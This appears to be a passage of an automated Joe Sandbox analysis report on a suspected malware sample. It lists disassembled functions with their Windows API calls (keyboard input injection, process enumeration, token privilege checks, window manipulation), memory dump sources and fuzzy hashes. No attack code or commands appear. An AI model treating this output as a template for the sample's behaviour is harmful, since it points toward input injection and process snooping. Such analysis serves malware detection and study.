                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                        • String ID:
                        • API String ID: 2652629310-0
                        • Opcode ID: 01adaee579ebebe6b8bf4dd47e4dad97404d95bb489d3452837c7b80edf0a83a
                        • Instruction ID: baff225efbda4ad63ec59b34815cff5a7d3f3f7419d928086635660e4acb2e82
                        • Opcode Fuzzy Hash: 01adaee579ebebe6b8bf4dd47e4dad97404d95bb489d3452837c7b80edf0a83a
                        • Instruction Fuzzy Hash: 0631C172A0221AABDF24DFA5DD45EEE7BA9EB81720F054168FC04D7150EB35CD51CB90
                        Function 00A152C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00A15352
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A15375
                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A15382
                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00A153A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: LongWindow$InvalidateMessageRectSend
                        • String ID:
                        • API String ID: 3340791633-0
                        • Opcode ID: 3bdedbc40e38eed23abe4e75f26fe4f6e1a90b07e3bf3eafecd9bcd8e7df57bb
                        • Instruction ID: a5b239070de5e836280c2e06e9b002664120c52c7e9c3c938c742bc1cf364214
                        • Opcode Fuzzy Hash: 3bdedbc40e38eed23abe4e75f26fe4f6e1a90b07e3bf3eafecd9bcd8e7df57bb
                        • Instruction Fuzzy Hash: 2B31C434E55A08EFEB349F74CC25BE83766AB85390F584102FA309B1E1C7B49DC0AB41
                        Function 009EAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 009EABF1
                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 009EAC0D
                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 009EAC74
                        • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 009EACC6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: KeyboardState$InputMessagePostSend
                        • String ID:
                        • API String ID: 432972143-0
                        • Opcode ID: 9fb91712908d187e4941020c8d6b1320088751aa588f7d66184e338fb3cddd53
                        • Instruction ID: 30b06061448a5289111ac2ada1ad6a57d80831c35795f1fba121fdf2004f4753
                        • Opcode Fuzzy Hash: 9fb91712908d187e4941020c8d6b1320088751aa588f7d66184e338fb3cddd53
                        • Instruction Fuzzy Hash: D6313B30A403986FEF36CB668C047FE7BA9AB85320F28471AE4D5521F1C378AD858753
                        Function 00A17674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                        Download Yara Rule
                        APIs
                        • ClientToScreen.USER32(?,?), ref: 00A1769A
                        • GetWindowRect.USER32(?,?), ref: 00A17710
                        • PtInRect.USER32(?,?,00A18B89), ref: 00A17720
                        • MessageBeep.USER32(00000000), ref: 00A1778C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Rect$BeepClientMessageScreenWindow
                        • String ID:
                        • API String ID: 1352109105-0
                        • Opcode ID: ad95808c4bacb3a855a0f50776d52cae3c949cefc372cbe8ba2de67b98dfad6e
                        • Instruction ID: 98a6cf134fe269b2e1177bcaa5fa3e0b5d162c4014fdd4be3870b6a29253fdd6
                        • Opcode Fuzzy Hash: ad95808c4bacb3a855a0f50776d52cae3c949cefc372cbe8ba2de67b98dfad6e
                        • Instruction Fuzzy Hash: 5A416D74A05214DFCB11CF98C894EEDB7F5FB49315F1591A8E4249B2A1C730E982CF90
                        Function 00A116DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                        Download Yara Rule
                        APIs
                        • GetForegroundWindow.USER32 ref: 00A116EB
                          • Part of subcall function 009E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009E3A57
                          • Part of subcall function 009E3A3D: GetCurrentThreadId.KERNEL32 ref: 009E3A5E
                          • Part of subcall function 009E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009E25B3), ref: 009E3A65
                        • GetCaretPos.USER32(?), ref: 00A116FF
                        • ClientToScreen.USER32(00000000,?), ref: 00A1174C
                        • GetForegroundWindow.USER32 ref: 00A11752
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                        • String ID:
                        • API String ID: 2759813231-0
                        • Opcode ID: 701271d0bf65717374d92ecb99c2ca433bbad2f1bfdc6ae562711609a7cb05ce
                        • Instruction ID: 56a27844342be0f294674723073164dccae35a6460ec15f6d60a2e839de0f26d
                        • Opcode Fuzzy Hash: 701271d0bf65717374d92ecb99c2ca433bbad2f1bfdc6ae562711609a7cb05ce
                        • Instruction Fuzzy Hash: 99313E71D00149AFDB00EFA9C885DEEBBF9EF88304B5080AAE515E7352D631DE45CBA1
                        Function 009ED4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 009ED501
                        • Process32FirstW.KERNEL32(00000000,?), ref: 009ED50F
                        • Process32NextW.KERNEL32(00000000,?), ref: 009ED52F
                        • CloseHandle.KERNEL32(00000000), ref: 009ED5DC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        • Opcode ID: 238ce7125f1f3aafe8e5f7a10c4e86194ca5488e1831894180a16bd19c576827
                        • Instruction ID: 80a62aa46aaf1f652f66445ad0b3c266acbf759f363d77c0a4708dd47c8e1718
                        • Opcode Fuzzy Hash: 238ce7125f1f3aafe8e5f7a10c4e86194ca5488e1831894180a16bd19c576827
                        • Instruction Fuzzy Hash: 1831AD71008340AFD301EF94C885BBFBBE8EFD9354F14092DF581862A1EB719A49CB92
                        Function 00A18FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • GetCursorPos.USER32(?), ref: 00A19001
                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009D7711,?,?,?,?,?), ref: 00A19016
                        • GetCursorPos.USER32(?), ref: 00A1905E
                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009D7711,?,?,?), ref: 00A19094
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                        • String ID:
                        • API String ID: 2864067406-0
                        • Opcode ID: 8cd5f7ea6bd16e263b7901033580346604bf38e4e7cb96c35120ca931b29ee98
                        • Instruction ID: 47df6954838f89f23c6b295b717f04fc7a202d7093df092a66edbcb27518be9e
                        • Opcode Fuzzy Hash: 8cd5f7ea6bd16e263b7901033580346604bf38e4e7cb96c35120ca931b29ee98
                        • Instruction Fuzzy Hash: 67217C35600128EFCB25CF98C868FFB7BBAEB89361F044069F90547261C3359D91DB61
                        Function 009ED2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                        • GetFileAttributesW.KERNEL32(?,00A1CB68), ref: 009ED2FB
                        • GetLastError.KERNEL32 ref: 009ED30A
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 009ED319
                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00A1CB68), ref: 009ED376
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast
                        • String ID:
                        • API String ID: 2267087916-0
                        • Opcode ID: 450494d2772b84023eaf6d98c6027f042b35508169304e0725d94acef41cf869
                        • Instruction ID: 5ff8bcc32dc4bf1c10b3387dcf50f28f7558307db83f4c1ab751133e1946e322
                        • Opcode Fuzzy Hash: 450494d2772b84023eaf6d98c6027f042b35508169304e0725d94acef41cf869
                        • Instruction Fuzzy Hash: 8D21B17450A2019FC300EF25C8818AEB7E8AF9A368F105A1DF499C72E1E730DD46CB93
                        Function 009E1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009E102A
                          • Part of subcall function 009E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009E1036
                          • Part of subcall function 009E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1045
                          • Part of subcall function 009E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 009E104C
                          • Part of subcall function 009E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009E1062
                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009E15BE
                        • _memcmp.LIBVCRUNTIME ref: 009E15E1
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E1617
                        • HeapFree.KERNEL32(00000000), ref: 009E161E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                        • String ID:
                        • API String ID: 1592001646-0
                        • Opcode ID: 849e8511ea97bf1fa43b9259eed6bb064c82e2f9f17adc2464a949754ff63c75
                        • Instruction ID: e37cacba53d03b9c2bac789893ef5ec1365bfd653d11994383d91cd3b203f485
                        • Opcode Fuzzy Hash: 849e8511ea97bf1fa43b9259eed6bb064c82e2f9f17adc2464a949754ff63c75
                        • Instruction Fuzzy Hash: 9E21AC31E40209EFDF05DFA6C945BEEB7B8EF84354F088459E445AB241EB30AE05CBA0
                        Function 00A12782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowLongW.USER32(?,000000EC), ref: 00A1280A
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A12824
                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00A12832
                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00A12840
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Long$AttributesLayered
                        • String ID:
                        • API String ID: 2169480361-0
                        • Opcode ID: 473e7940905b01acc26a9224f963632761fce74538b22835c6a654286d700c2b
                        • Instruction ID: a9a56803b3d78c4a33d9a96f3a1725dfbaed56a6d211085a67a556483035e3b9
                        • Opcode Fuzzy Hash: 473e7940905b01acc26a9224f963632761fce74538b22835c6a654286d700c2b
                        • Instruction Fuzzy Hash: 5F21B035244511AFE714DB24C845FEA7BAAAF85324F148158F4268B6E2CB71FC92CBD0
                        Function 009E78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,009E790A,?,000000FF,?,009E8754,00000000,?,0000001C,?,?), ref: 009E8D8C
                          • Part of subcall function 009E8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 009E8DB2
                          • Part of subcall function 009E8D7D: lstrcmpiW.KERNEL32(00000000,?,009E790A,?,000000FF,?,009E8754,00000000,?,0000001C,?,?), ref: 009E8DE3
                        • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,009E8754,00000000,?,0000001C,?,?,00000000), ref: 009E7923
                        • lstrcpyW.KERNEL32(00000000,?), ref: 009E7949
                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,009E8754,00000000,?,0000001C,?,?,00000000), ref: 009E7984
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: lstrcmpilstrcpylstrlen
                        • String ID: cdecl
                        • API String ID: 4031866154-3896280584
                        • Opcode ID: 0ddd84d99e137f1704aa9f47bc0ab5e295aded36be3ea9d205054c4cc190b153
                        • Instruction ID: cfd39c45fe6bdc7000232f299f2376ad23ff27c306c7aa5095dac41c0207cf56
                        • Opcode Fuzzy Hash: 0ddd84d99e137f1704aa9f47bc0ab5e295aded36be3ea9d205054c4cc190b153
                        • Instruction Fuzzy Hash: 2011E93A200381ABCB169FB9DC45E7BB7A9FF85350B50802AF946C72A5EB319C11C752
                        Function 00A17CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • GetWindowLongW.USER32(?,000000F0), ref: 00A17D0B
                        • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00A17D2A
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A17D42
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009FB7AD,00000000), ref: 00A17D6B
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$Long
                        • String ID:
                        • API String ID: 847901565-0
                        • Opcode ID: a265ecbf19d75d170229ce29caa016894ae49910957629b86edfa28a65b73aee
                        • Instruction ID: 9806152d2e6c5495448c874b449d512e3679152ce8171c90d0a3183b966752a1
                        • Opcode Fuzzy Hash: a265ecbf19d75d170229ce29caa016894ae49910957629b86edfa28a65b73aee
                        • Instruction Fuzzy Hash: 18118C31645619AFCB109F68DC04ABA3BB5BF45375B159724F839C72E0D7309991CB90
                        Function 00A15660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001060,?,00000004), ref: 00A156BB
                        • _wcslen.LIBCMT ref: 00A156CD
                        • _wcslen.LIBCMT ref: 00A156D8
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A15816
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend_wcslen
                        • String ID:
                        • API String ID: 455545452-0
                        • Opcode ID: 5ecaaf5ee138d23bcaaef3967b3d2861a7a00e7d6c9e8f37944fee612e49ffbd
                        • Instruction ID: 5f8ca1f545829b3da26dd4dbcafe609526cbe4beb5fa2f933199f1d35aa057ac
                        • Opcode Fuzzy Hash: 5ecaaf5ee138d23bcaaef3967b3d2861a7a00e7d6c9e8f37944fee612e49ffbd
                        • Instruction Fuzzy Hash: CF11B471E00604DADF20DFB5CC85AEE777CAF95764B108026F915D6081E77489C4CBA0
                        Function 009B1D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 775968df65c5cc5b038ec408aac648ddf38c2188eda5e7f41a6c5f1c98520a1e
                        • Instruction ID: 3838314a6ae8aadb1db9e5d47f2256a6db90615c5fcb3b80f445f6e5106e9778
                        • Opcode Fuzzy Hash: 775968df65c5cc5b038ec408aac648ddf38c2188eda5e7f41a6c5f1c98520a1e
                        • Instruction Fuzzy Hash: B801ADB220A61A7FF6212AB86DD0FE7671CEFC17B8F740725F521A11D2DB608C005160
                        Function 009E1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 009E1A47
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009E1A59
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009E1A6F
                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009E1A8A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 4aa99e840b01aaf418895167989a434da2328ffe94b3baeb72c5619a38587d5e
                        • Instruction ID: e82ecf9922219db65762784fcee6ebd7ff602adee1aab3dc3212097b915b1ac4
                        • Opcode Fuzzy Hash: 4aa99e840b01aaf418895167989a434da2328ffe94b3baeb72c5619a38587d5e
                        • Instruction Fuzzy Hash: 0D11393AD01219FFEF11DBA5CD85FADBB78EB08750F2000A1EA00B7290D6716E50DB94
                        Function 009EE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 009EE1FD
                        • MessageBoxW.USER32(?,?,?,?), ref: 009EE230
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009EE246
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009EE24D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                        • String ID:
                        • API String ID: 2880819207-0
                        • Opcode ID: 75961d5441b2b0721e190de313784a8e18bbaa75e9ee4a3367dfc4ab741e80cc
                        • Instruction ID: 772f70c51c918d8591f6f8c7366fc7fc4240ae5f78ed25b4be88e948d1d26551
                        • Opcode Fuzzy Hash: 75961d5441b2b0721e190de313784a8e18bbaa75e9ee4a3367dfc4ab741e80cc
                        • Instruction Fuzzy Hash: 3B1104B6904254BBC702DFE89C09BEE7FACAB85331F008215F924E7390D2B0CE0587A0
                        Function 009AD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateThread.KERNEL32(00000000,?,009ACFF9,00000000,00000004,00000000), ref: 009AD218
                        • GetLastError.KERNEL32 ref: 009AD224
                        • __dosmaperr.LIBCMT ref: 009AD22B
                        • ResumeThread.KERNEL32(00000000), ref: 009AD249
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
